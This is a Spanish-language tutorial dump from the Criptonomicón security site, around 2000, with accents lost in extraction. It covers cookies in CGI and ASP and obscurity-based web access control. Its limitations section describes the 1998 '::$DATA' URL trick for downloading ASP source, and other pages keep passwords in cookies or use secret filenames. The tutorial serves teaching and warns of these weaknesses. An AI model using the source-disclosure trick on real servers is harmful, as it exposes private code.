Cuando el servidor recibe peticiones del cliente, comprueba si en la variable de
entorno HTTP_COOKIE existen cookies. Aadiendo la siguiente lnea al programa
anterior, podemos visualizar las cookies que hemos recibido del servidor:
printf( "%s
", getenv("HTTP_COOKIE") );

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/rececgi.html (1 of 2) [25/10/2000 02:32:06 p.m.]

Cookies - Recetas en CGI

Podemos ver cmo funcionara el programa anterior completo, pulsando el botn de


enviar cookie.
enviar cookie

Por supuesto, en el caso anterior, el envo de la cookie se podra generalizar, creando


una funcin que mandase cookies, a la que se le pasasen como parmetros los
campos de la cookie:
void set_cookie(char *name, char *value, char *expires,
char *path, char *domain, short secure)
{
printf("Set-Cookie: %s=%s;",name,value);
if (expires != NULL)
printf(" EXPIRES=%s;",expires);
if (path != NULL)
printf(" PATH=%s;",path);
if (domain != NULL)
printf("DOMAIN=%s;",domain);
if (secure)
printf(" SECURE");
printf("\n");
}
Nota: Es importante no olvidar la nueva lnea \n al final del envo de la cookie, as como los dos
saltos de lnea en printf("Content-type: text/html\n\n");

Si quieres, puedes estudiar el listado completo del programa anterior.


Para ver ejemplos ms complicados, visita la pgina de ejemplos.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/rececgi.html (2 of 2) [25/10/2000 02:32:06 p.m.]

Cookies - Recetas en ASP

Principal
Riesgos
Usos
Ejemplos
A dieta
Recursos

Recetas en ASP

Descripcin
La caja de las cookies

Ingredientes
Las Pginas Activas de Servidor (Active Server Pages) o ASP
Recetas en JavaScript
para abreviar, representan el paradigma de la filosofa de
Recetas en CGI
Microsoft en su estrategia para Internet. A diferencia de otros
productos de Microsoft, como los controles ActiveX o los guiones Recetas en ASP
Horno Express
en VisualBasic (VBScript), las aplicaciones ASP se procesan y
ejecutan en el servidor y no en el cliente, siendo en este sentido
parecidas a las aplicaciones CGI, pero integrando otros servicios y aplicaciones
Microsoft, todo ello utilizando el lenguaje Visual Basic como aglutinante.

El bloque bsico de construccin de las aplicaciones ASP lo constituyen los objetos


de Servidor Activo. En particular, las cookies pertenecen a la coleccin Cookies y se
utilizan dos objetos del servidor, Response y Request, para enviarlas y recibirlas,
respectivamente.
En una primera instancia, las cookies se podran leer recuperando la variable de
entorno HTTP_COOKIE por medio de Request.ServerVariables
("HTTP_COOKIES"), como hacamos en CGI, pero en cambio utilizaremos la
llamada a Request.Cookies, que extrae de la coleccin de cookies todas aquellas que
el servidor est autorizado a leer del disco duro del usuario (en funcin del valor del
campo domain, como se explic en la seccin sobre los ingredientes). La sintaxis es
muy sencilla:
Request.Cookies ("nombre_cookie") [("nombre_clave")]
Las claves son opcionales (por eso estn entre corchetes, indicando que si quieres las
pones y si no, pues no) y su concepto se asemeja al de las entradas en un diccionario,
es decir, un nombre y su valor (o definicin). Veamos un ejemplo concreto:
queremos una cookie que almacene el nombre y apellido de un usuario, para lo cual
mandaremos la siguiente cookie:
cliente = "nombre=Gonzalo&apellido=Alvarez"
donde cliente es el nombre de la cookie, nombre es la primera clave, de valor igual a
Gonzalo y apellido es la segunda clave, de valor igual a Alvarez. La forma de
recuperar en el servidor esas claves ser:
Request.Cookies ("cliente") ("nombre")
Request.Cookies ("cliente") ("apellido")
Una llamada a Request.Cookies directamente devolver todas las cookies
file:///C|/TEMP/criptonomicon/criptonomicon/cookies/receasp.html (1 of 2) [25/10/2000 02:32:06 p.m.]

Cookies - Recetas en ASP

(todas las parejas nombre-valor) de la coleccin de cookies, en forma de cadena:


strQuery = Request.Cookies
Ojo, que estar codificado en el formato URL (escapando caracteres como ,~, &,
etc.).
Fcil, verdad? Pasemos a ver cmo hace el servidor para enviar cookies. Para ello
utilizaremos la llamada a Response.Cookies. Hay que tener en cuenta que
Response.Cookies pertenece a las cabeceras HTTP, lo cual significa que se
debe enviar antes que el contenido de la pgina. Es decir, debe ir antes que las
etiquetas <HTML>, <HEAD>, etc. En este caso, la sintaxis es:
Response.Cookies ("nombre_cookie") [("nombre_clave")] =
"valor de la cookie"
Ahora el nombre de clave ya nos es familiar. Por supuesto es opcional y si queremos
incluir varias claves en la misma cookie, se podra hacer de la siguiente forma:
Response.Cookies("cliente")("nombre") = "Gonzalo"
Response.Cookies("cliente")("apellido") = "Alvarez"
Para dar valor al resto de atributos, se utiliza la sintaxis:
Response.Cookies
Response.Cookies
Response.Cookies
Response.Cookies

("nombre_cookie").Expires = fecha
("nombre_cookie").Domain = "dominio"
("nombre_cookie").Path = "camino"
("nombre_cookie").Secure = valor

Por ejemplo, para enviar la cookie, con el nombre y apellido del cliente y que
caduque en un ao, para nuestro dominio y a partir del directorio raz, haremos:
Response.Cookies
Response.Cookies
Response.Cookies
Response.Cookies
Response.Cookies
Response.Cookies

("cliente")("nombre") = "Gonzalo"
("cliente")("apellido") = "Alvarez"
("cliente").Expires = Date + 365
("cliente").Path = "/"
("cliente").Domain = ".iec.csic.es"
("cliente").Secure = 1

Podis ver cmo funciona todo en varios ejemplos: en uno de ellos se os enva una
cookie y en el otro se leen todas las cookies que haya enviado este servidor.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/receasp.html (2 of 2) [25/10/2000 02:32:06 p.m.]

Cookies - Horno Express

Principal
Riesgos
Usos
Ejemplos

Descripcin

Horno Express

La caja de las cookies

A dieta

Ingredientes

Instrucciones de uso:
Recursos

Recetas en JavaScript

1. Primero, corta y pega las funciones de cookies en la cabecera


del documento.

Recetas en CGI
Recetas en ASP
Horno Express

2. Rellena el formulario con el nombre y valor de tu cookie y


especifica la fecha de caducidad; opcionalmente, puedes especificar el camino,
dominio y seguridad.

3. Pincha en Hornear, luego corta y pega el cdigo resultante en la seccin apropiada


de tu documento.
nombre:
valor:
constante
caduca:
o bien
o bien

variable

al terminar la sesin del navegador del ususario


segundos

en
en

Diciembre

a las

11

31

59

en el ao
59

parmetros opcionales:
camino:
dominio:
seguro:

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/horno.html (1 of 2) [25/10/2000 02:32:06 p.m.]

pm

1999

Cookies - Horno Express

Esta herramienta es una adaptacin de la creacin de Charity Kahn.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/horno.html (2 of 2) [25/10/2000 02:32:06 p.m.]

Cookies - Ejemplo en ASP

Principal
Qu son
Riesgos
Usos
A dieta
Ejemplos
Recursos

Cmo recordar datos del cliente


Si esta es la primera vez que visitas este ejemplo, necesitars registrarte. Registrarse
es completamente GRATIS. Simplemente introduce un login y password de tu
eleccin, que se almacenarn en una cookie en tu disco duro, de modo que cuando
accedas al ejemplo de nuevo en el futuro, se leern de tu cookie y no necesitars
teclearlos una y otra vez.
Login:

Password:

(Un sitio normal incluira aqu preguntas sobre tu nombre, profesin, direccin,
ingresos, etc.)
Enviar

Puedes consultar la pgina de control de acceso con ASP para ms informacin.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/ejempasp.asp.htm [25/10/2000 02:32:07 p.m.]

Cmo restringir el acceso a pginas Web - ASP

Suscripcin gratis

Intimidad?

Artculos

Control de acceso en ASP

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Este tipo de control resulta especialmente til cuando se desea


acceder a servicios como consultas a bases de datos u otro tipo de
pginas generadas al vuelo, es decir, pginas para las que no
existe a priori un URL asignado, ya que su contenido depender
de la solicitud del usuario.
Normalmente, lo que se hace es presentar una pgina de
autenticacin, en la que se solicita el nombre de usuario y la clave
de acceso (login.htm). Si el usuario se autentica con xito,
entonces se le permite acceder al servicio protegido. Haz la prueba
en este ejemplo. El nombre de usuario es gon y la contrasea, alv.

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Localizacin

JavaScript

Java

ASP

CGI

Java

JavaScript

Nombres

No hay que temer por que el cdigo VBScript quede al


Limitaciones
descubierto si se intenta ver el cdigo fuente de la pgina, ya que
a diferencia de lo que ocurre con Java o JavaScript, en ASP el
cdigo se ejecuta en el propio servidor y no en el cliente (ver problemas con el
listado del cdigo fuente). En cualquier caso, incluso acceder directamente a la
pgina login.htm resulta intil, ya que no ofrece ninguna pista acerca de qu hay
dentro de la pgina ASP.
Adems, en vez de almacenar la informacin del usuario en una variable de sesin,
se podra guardar en una cookie, de manera que estuviera accesible la prxima vez
que se accediese a esa pgina sin necesidad de pasar de nuevo por todo el proceso de
autenticacin. Comprubalo en este ejemplo con cookies. De nuevo, el nombre de
usuario es gon y la contrasea, alv.
Al igual que en los formularios de CGI, hay que tener cuidado con los usuarios de
Internet Explorer 5.0 o superiores, ya que pueden tener activada la funcin de
Autocompletar, con los problemas que conlleva.

Correo seguro

Web seguro
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Susurros desde la Cripta

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/asp.html (1 of 2) [25/10/2000 02:32:07 p.m.]

Cmo restringir el acceso a pginas Web - ASP


Consejos prcticos

visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/asp.html (2 of 2) [25/10/2000 02:32:07 p.m.]

Cmo restringir el acceso a pginas Web - Nombres

Suscripcin gratis

Intimidad?

Artculos

La clave est en el nombre

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

En estos casos en los que no se puede acceder a la configuracin


del servidor, no queda ms remedio que basarse en el secreto del
nombre del fichero o ficheros que se desea proteger. Entindase
bien que al hablar de nombre nos referimos al camino o URL
completo que localiza al fichero en el servidor Web. Por lo tanto,
bastar con mantener en secreto cualquier parte de ese camino
para asegurar la proteccin del fichero. As pues,
la parte del nombre que permanezca secreta constituir la clave
de acceso.

Nombres

Localizacin

JavaScript

Java

ASP

Por supuesto, este tipo de proteccin basada en el cliente no puede


CGI
considerarse como un mtodo absolutamente seguro (alguno lo
es?) y nunca se deber utilizar para proteger documentos crticos
Limitaciones
de una organizacin o compaa. Para tales situaciones ms
exigentes existen tcnicas mucho ms potentes que requieren privilegios de acceso
para configurar el servidor, que normalmente slo estarn al alcance de su
administrador. No obstante, para proteger ciertas reas o ficheros en pginas
personales o en un pequeo sitio Web de la mirada de fisgones casuales, estos
mtodos ofrecen unos resultados excelentes.

Agujeros

Spam
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Remailers

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/nombres.html (1 of 2) [25/10/2000 02:32:07 p.m.]

Cmo restringir el acceso a pginas Web - Nombres


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/nombres.html (2 of 2) [25/10/2000 02:32:07 p.m.]

Cmo restringir el acceso a pginas Web - Localizacin

Suscripcin gratis

Intimidad?

Artculos

El conocimiento es la puerta

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

S, el conocimiento del nombre del fichero es la puerta de entrada


Nombres
que permite acceder a sus contenidos. Una forma de restringir el
acceso a un fichero de un sitio Web consiste en dejarlo en algn
Localizacin
directorio, como por ejemplo el raz. Supongamos que el
documento cuyo acceso se desea restringir se llama
JavaScript
secretitos.doc y lo tenemos albergado en
www.confidencial.es. Si no se dispone de ningn enlace al
Java
mismo desde alguna otra pgina, basta con almacenarlo
simplemente en el directorio raz, de manera que su URL sea:
ASP
www.confidencial.es/secretitos.doc, para que slo
la persona que conozca a priori su nombre y localizacin pueda
CGI
recuperarlo. Para ello, claro est, es condicin indispensable
impedir el listado de directorios. Por consiguiente, bastara con
Limitaciones
proporcionar a los usuarios a los que queremos garantizar el
acceso el nombre y camino del fichero para que slo ellos fueran capaces de
recuperarlo.
Ahora bien, si queremos proporcionar una interfaz ms profesional y flexible, ser
necesario escribir una pequea aplicacin en algn lenguaje como Java o JavaScript
o en CGI o ASP, por citar algunos ejemplos. Los requisitos que impondremos a esta
aplicacin son que nos presente una ventana en la que se nos solicite un nombre de
usuario y una palabra clave, o por lo menos una palabra clave, para acceder a los
contenidos restringidos. Tambin se le puede exigir opcionalmente que almacene
esos datos en una cookie, de manera que el usuario no tenga que introducirlos cada
vez.
A continuacin, en las secciones siguientes, iremos viendo cmo estos requisitos
toman cuerpo, utilizando para ello diversas tecnologas Web, a saber: JavaScript,
Java, ASP y CGI.

Correo seguro

Web seguro
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Susurros desde la Cripta

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/localizacion.html (1 of 2) [25/10/2000 02:32:08 p.m.]

Cmo restringir el acceso a pginas Web - Localizacin


Consejos prcticos

privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/localizacion.html (2 of 2) [25/10/2000 02:32:08 p.m.]

Cmo restringir el acceso a pginas Web - JavaScript

Suscripcin gratis

Intimidad?

Artculos

Cmo restringir el acceso en JavaScript

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Como hemos dicho, la clave de acceso es el propio nombre del


fichero (o parte del mismo). Existen muchas formas de proteger el
acceso a las pginas, que se traducirn en diferentes formas de
esconder la clave dentro del cdigo en JavaScript. Aqu aparece la
primera limitacin inherente a estos mtodos, y es que el cdigo
JavaScript se puede examinar sin ms que editar el cdigo fuente
de la pgina Web en la cual est embebido. Existen algunos
programadores, que bien por su candidez, bien porque confan en
la candidez de los usuarios, declaran la palabra clave dentro del
propio cdigo, lo cual la hace visible para todo aquel que se
moleste en examinar el cdigo fuente, por lo que lo consideramos
un sistema extremadamente vulnerable y que se debe evitar a toda
costa. En cualquier caso, por motivos puramente didcticos,
incluir un ejemplo de una aplicacin tal.

Nombres

Localizacin

JavaScript

Java

ASP

CGI

Limitaciones

El mtodo ms sofisticado en JavaScript consiste en presentar una ventana de


peticin de clave, que se corresponde con el nombre del fichero. En general, existirn
por lo menos dos documentos:
La pgina de entrada, en la que aparece el enlace a la pgina protegida.
La pgina destino que se quiere proteger y cuyo nombre constituye la clave.
Puedes examinar un ejemplo de este mtodo de proteccin.

Spam

Remailers

Anonimato

Correo seguro

Tambin es posible proteger todos los archivos de un directorio con una nica clave,
que consistir en el nombre del directorio. Ahora, el nombre del fichero es conocido,
pero no su localizacin. De esta forma, si queremos cambiar la clave de acceso a
varios ficheros no ser necesario cambiarles el nombre a todos (no hay que olvidar
que la clave de acceso es el propio nombre del fichero), sino que bastar con
moverlos a todos a otro directorio distinto, cuyo nombre pasar a ser la nueva clave.
Comprubalo en el ejemplo.

Web seguro

Todos estos mtodos presetan varias limitaciones.

Susurros desde la Cripta

Para los que estis interesados en aprender ms sobre protecciones en JavaScript y


cmo saltarlas, os recomiendo que visitis las pginas de Fravia, con suficiente

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/javascript.html (1 of 2) [25/10/2000 02:32:08 p.m.]

Cmo restringir el acceso a pginas Web - JavaScript


Consejos prcticos

material para el cerebro como para pasar varios meses enfrascado en ellas.

Referencias

Si quieris aprender ms sobre JavaScript, visita las pginas del curso de


Introduccin a la programacin en JavaScript.

Libro de Visitas

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/javascript.html (2 of 2) [25/10/2000 02:32:08 p.m.]

Cmo restringir el acceso a pginas Web - Java

Suscripcin gratis

Intimidad?

Artculos

Control de acceso en Java

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

En Java se puede elaborar un mtodo de proteccin similar,


consistente en solicitar a travs de una applet de Java la palabra
clave, que ser el nombre del fichero que deseamos obtener. El
cdigo de la applet comprobar en primer lugar si existe esa
pgina Web (correspondiente a la clave introducida por el
usuario), para pasar despus, en caso afirmativo, a abrirla en la
misma ventana desde la que se lanz la applet.
Lo mejor es verlo en un sencillo ejemplo.

Nombres

Localizacin

JavaScript

Java

ASP

No hay que olvidar, como se discute en la seccin de limitaciones,


CGI
que no conviene incluir la clave dentro del cdigo fuente (fichero
.java), ya que es muy fcil obtenerlo a partir de los ficheros
Limitaciones
compilados de clase (.class), aunque a simple vista no lo
parezca. Puedes encontrar una discusin sobre la proteccin del cdigo en Java en la
seccin sobre ofuscacin del curso de seguridad en Java.
La ventaja de los mtodos en Java frente a JavaScript es que permiten mayor
sofisticacin, mejores interfaces grficos, gestin de otras caractersticas del control
de acceso, como log de intentos fallidos, bases de datos con nombres y claves de
acceso para proteger distintas pginas, etc.
Buen ejemplo de ello son CodeLink o RiadaLock. Otra aplicacin tal escrita en Java
es Guardbot.

Remailers

Anonimato

Correo seguro

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/java.html (1 of 2) [25/10/2000 02:32:08 p.m.]

Cmo restringir el acceso a pginas Web - Java


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/java.html (2 of 2) [25/10/2000 02:32:08 p.m.]

Cmo restringir el acceso a pginas Web - CGI

Suscripcin gratis

Intimidad?

Artculos

Control de acceso en CGI

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

En este caso, la tcnica utilizada en su forma ms simple consiste


en servirse de un guin o programa en CGI como filtro entre el
usuario y la pgina que se desea proteger, con el fin de evitar
accesos no deseados. Esta aplicacin CGI debe alojarse en el
directorio cgi-bin del servidor u otro directorio que el
administrador proporcione a tal efecto, algo a lo que algunos
administradores se muestran reacios. De hecho, muchos se
negarn o no ofrecern esta posibilidad, por lo que se deber
recurrir en ese caso a alguno de los mtodos anteriormente
descritos, que no dependen del servidor.

Nombres

Localizacin

JavaScript

Java

ASP

CGI
Como en los casos previamente analizados, se trata de leer una
clave introducida por del usuario y garantizar el acceso slo si la
Limitaciones
clave es correcta. En este caso, dado que el cdigo fuente no se
encuentra disponible para los usuarios, bien porque el programa se compila, o bien
porque, aun siendo interpretado, el servidor no permite su listado, resulta posible
embeber la clave dentro del cdigo fuente, como se hace en el ejemplo. Una vez
verificada la clave, simplemente se transporta al usuario a la pgina de error si
aqulla es incorrecta, o a la pgina protegida, si fuera correcta, como en este ejemplo.
En este tipo de pginas, en las que se pide la clave a travs de un formulario, pueden
existir problemas debido a la funcionalidad de Autocompletar de Internet Explorer.

Ahora bien, puede resultar tedioso tener que introducir el nombre y la clave cada vez
que queremos acceder a pginas protegidas en el Web. Para evitar esta repeticin,
una posible solucin consiste en pedir el nombre y la clave una sola vez y
almacenarlos en una cookie, de manera que a partir de ese momento cada vez que se
acceda a un servicio protegido, se compruebe la informacin de autenticacin
leyendo la cookie. Puedes comprobarlo en este ejemplo. No hay que olvidar los
problemas que plantea este enfoque con cookies.

Correo seguro

Web seguro

Susurros desde la Cripta

Por otro lado, dado que con CGI se pueden generar pginas al vuelo, se nos
presentan interesantes posibilidades para soslayar el problema del bookmarking. Por
ejemplo, imaginemos que deseamos ofrecer una coleccin de fotos a aquellos que
hayan pagado por verlas. Si las fotos no se acceden directamente a travs de un URL,
sino por medio de un CGI, evitamos as que nadie pueda enlazarlas directamente. Si

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/cgi.html (1 of 2) [25/10/2000 02:32:09 p.m.]

Cmo restringir el acceso a pginas Web - CGI


Consejos prcticos

Referencias

Libro de Visitas

combinamos esta capacidad con el almacenamiento de la informacin de


autenticacin en una cookie, conseguiremos que no sea necesario autenticarse para
cada imagen descargada. En el siguiente ejemplo se muestra cmo se puede llevar a
la prctica esta forma de servir imgenes.
Nota: en los ejemplos en CGI escritos en C, he hecho uso de las bibliotecas desarrolladas por
Eugene Eric Kim, que pueden descargarse desde su pgina web, eekim.com.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/cgi.html (2 of 2) [25/10/2000 02:32:09 p.m.]

Cmo restringir el acceso a pginas Web - Limitaciones de estos mtodos

Suscripcin gratis

Intimidad?

Artculos

Limitaciones de estos mtodos

Seguridad

Listado de directorios

Nombres

Linux

Navegacin segura

Control de acceso

Si en la ventana de URL se introduce el nombre de un directorio,


puede ocurrir que aparezcan listados los contenidos de ese
directorio, con sus carpetas y ficheros. En estas circunstancias,
estos esquemas de proteccin resultaran intiles, ya que se
podra ver el nombre de los ficheros (o lo que es lo mismo, las
claves).

CGI

Localizacin

JavaScript

Java

ASP

Cookies

Solucin
En la configuracin del servidor est disponible la posibilidad de
CGI
deshabilitar el listado de directorios, as como la presentacin por
defecto de un fichero cuando se solicite el nombre del directorio.
Limitaciones
Este fichero suele llamarse index.html o default.htm y si
no est presente, aparecer una pgina de error en vez de listarse el contenido del
fichero.

Crashes

Bookmarking

Java

JavaScript

Agujeros

Spam

Remailers

Anonimato

Una vez que un usuario ha accedido a la pgina protegida, es decir, una vez que
conoce su URL, nada impide que lo guarde en su lista de marcadores y acceda a l
en el futuro sin pasar antes por el proceso de autenticacin. Es ms, podra desde
una pgina Web poner un enlace a la pgina o fichero protegido en cuestin, de
manera que cualquier usuario podra acceder a l sin autenticarse antes.
Solucin
Cambiar frecuentemente la clave/nombre del fichero a proteger, de manera que no se
pueda acceder directamente a la pgina sin pasar antes por el proceso de
autenticacin (al menos no por mucho tiempo).

Correo seguro

Web seguro

En ASP no existe este problema, siempre que el proceso de autenticacin se embeba


en la misma pgina que se desea proteger.
Utilizando CGI como se ha descrito, tampoco existe tal problema.

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/limitaciones.html (1 of 4) [25/10/2000 02:32:09 p.m.]

Cmo restringir el acceso a pginas Web - Limitaciones de estos mtodos


Consejos prcticos

Referencias

Libro de Visitas

Listado del cdigo fuente


No hay que perder de vista el hecho de que en Java el proceso de compilacin no
oculta completamente el cdigo fuente del programa, ya que el fichero objeto
contiene mucha informacin, hasta el punto de que puede decompilarse sin
problemas usando alguno de los muchos decompiladores que existen. Por lo tanto,
no hay que olvidar que el usuario firmemente determinado ser capaz de obtener el
cdigo fuente ms tarde o ms temprano, por lo que no conviene dejar en l material
sensible ni claves en claro. Hay quien cifra las claves, pero dado que la propia clave
de cifrado debe estar embebida en el cdigo para que ste funcione, no se trata
tampoco de una solucin robusta.
En ASP, se descubri en julio de 1998 un importante agujero de seguridad: basta
con aadir "::$DATA" a continuacin de una direccin URL en la ventanita
"Direccin" de nuestro navegador, para que en vez de ejecutarse en el servidor la
pgina de servidor activa (ASP), se descargue en un fichero su cdigo fuente, en
lugar de descargarse el resultado de su ejecucin. Segn qu informacin protegiera
la pgina ASP, este fallo permitira acceder a la misma si trataba de informacin
esttica (texto o imgenes), resultando intil para informacin activa (acceso a una
base de datos).
Solucin
En Java, se pueden utilizar ofuscadores de cdigo, que dificultan la labor de
decompilacin.
En ASP, se debe instalar el parche de Microsoft para evitar este fallo o impedir la
lectura de ficheros ASP, habilitando slo su ejecucin.

Cookies
El problema ms importante que plantean las cookies es que la informacin de
nombre y clave quedan guardados en el disco duro, de manera que cualquier
persona que disponga de acceso fsico al mismo ser capaz de leerla y por
consiguiente entrar a ese servicio.
Por otro lado, no todos los navegadores soportan cookies, o bien su aceptacin est
desactivada en muchos de ellos.
Solucin
Respecto al acceso fsico a la cookie, la nica solucin consiste en que el usuario
proteja convenientemente sus archivos sensibles cuando no los est utilizando.
En cuanto a los usuarios que desactivan la navegacin con cookies, se les debe avisar
del propsito de estas cookies para que no desconfen de ellas y las habiliten mientras
navegan por nuestras pginas. Los monstruos de galletas son otra solucin aceptable.
En cualquier caso, el uso de cookies es ms una conveniencia que una necesidad, por
lo que si un usuario no puede o no quiere aceptar cookies, los mtodos que las

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/limitaciones.html (2 of 4) [25/10/2000 02:32:09 p.m.]

Cmo restringir el acceso a pginas Web - Limitaciones de estos mtodos

utilizan no dejaran de funcionar, sino que se veran obligados a autenticarse para


cada documento protegido que quisieran visualizar.
Se puede obtener ms informacin sobre las cookies en el curso sobre cookies.

Autocompletar contraseas
Internet Explorer 5.0 incorpora la posibilidad de recordar los campos que se
rellenan en un formulario, incluidas las contraseas. Esta caracterstica, que puede
resultar muy cmoda para una persona que es la nica usuaria de un ordenador,
abre un importante problema de seguridad cuando son varios los usuarios que
navegan desde la misma cuenta en el ordenador.
Cuando un usuario visita una pgina en la que se le pide login y password, tras
haberlos introducido, le aparecer una ventana en la que se le pregunta si desea que
Windows recuerde la contrasea para no tener que escribirla la prxima vez que
visite esa pgina. En caso afirmativo, quedar almacenada de forma codificada en el
registro de configuraciones de Windows, de manera, que en el futuro, cada vez que
se acceda a la misma pgina, se rellener la contrasea automticamente. Para
usuarios que se conectan a multitud de servicios de Internet, esta funcionalidad
adicional puede simplificarles terriblemente la vida, en la medida en que no
necesitan recordar docenas de contraseas distintas. Sin embargo, si otro usuario
navegando desde su misma cuenta accediera a esa pgina, automticamente
recibira permiso para acceder a ella.
Solucin
Qu puede hacer el usuario
En primer lugar, en la ventana que se le presenta debe contestar que no lo desea y
activar la casilla "No volver a ofrecer recordar contraseas".
Si esta funcionalidad ya est activada, puede borrar todas las contraseas y desactivar
la caracterstica en Herramientas --> Opciones de Internet... --> Contenido -->
Autocompletar... .
Qu puede hacer el administrador
Como un creador de pginas web no puede prever lo que harn los potenciales
visitantes, ms vale asegurarse de que no ocurrirn sorpresas. Puede desactivar la
posibilidad de Autocompletar aadiendo el atributo AUTOCOMPLETE="OFF" a la
etiqueta <FORM>:
<FORM METHOD="POST" ACTION="ENVIAR.ASP"
AUTOCOMPLETE="OFF">
En el caso de que slo se quiera desactivar el autocompletado en algunos campos
ms comprometidos del formulario y no en todos, puede utilizarse ese mismo
atributo en las etiquetas de los campos, por ejemplo:

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/limitaciones.html (3 of 4) [25/10/2000 02:32:09 p.m.]

Cmo restringir el acceso a pginas Web - Limitaciones de estos mtodos

<INPUT TYPE="PASSWORD" NAME="CLAVE" SIZE="15"


MAXLENGTH="15" AUTOCOMPLETE="OFF">
que desactivar autocompletar solamente en ese campo en concreto.

Advertencia final!
Ninguno de estos mtodos debe ser considerado como una solucin a prueba de
intrusos. En ningn caso es posible aproximarse a los niveles de seguridad
proporcionados por el servidor, usando autenticacin bsica, desafo y respuesta,
certificados, u otras tcnicas. Estos mtodos estn diseados para proteger recursos
que no requieran alta seguridad. No se recomienda su uso para la proteccin de
informacin altamente secreta.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/limitaciones.html (4 of 4) [25/10/2000 02:32:09 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin11.txt

